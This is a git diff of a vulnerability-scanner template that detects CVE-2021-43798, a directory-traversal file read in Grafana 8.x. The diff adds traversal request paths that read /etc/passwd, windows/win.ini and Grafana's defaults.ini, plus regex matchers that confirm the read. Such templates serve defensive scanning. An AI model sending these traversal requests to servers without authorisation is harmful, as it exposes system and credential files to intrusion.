diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml
index 73f3f78b8f..08d88ae9f4 100644
--- a/cves/2021/CVE-2021-43798.yaml
+++ b/cves/2021/CVE-2021-43798.yaml
@@ -2,7 +2,7 @@ id: CVE-2021-43798
 
 info:
   name: Grafana v8.x Arbitrary File Read
-  author: z0ne,dhiyaneshDk
+  author: z0ne,dhiyaneshDk,j4vaovo
   severity: high
   description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
   reference:
@@ -24,16 +24,20 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd"
+      - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini"
+      - "{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
 
       - type: regex
         regex:
           - "root:.*:0:0:"
+          - "for 16-bit app support"
+          - "socket = /tmp/grafana.sock"
+        condition: or
 
       - type: status
         status:
           - 200
-
-# Enhanced by mp on 2022/02/28